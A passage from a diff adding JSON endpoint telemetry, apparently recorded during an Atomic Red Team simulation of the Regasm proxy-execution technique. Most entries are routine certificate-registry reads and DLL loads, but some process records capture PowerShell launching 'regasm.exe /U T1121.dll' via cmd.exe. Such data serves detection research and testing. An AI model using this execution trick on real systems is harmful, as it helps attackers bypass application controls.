"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "subtype": "terminate", + "timestamp": 131883570861360000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6712, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861680000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5012, + "ppid": 6712, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "subtype": "create", + "timestamp": 131883570861830000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}", + "unique_ppid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 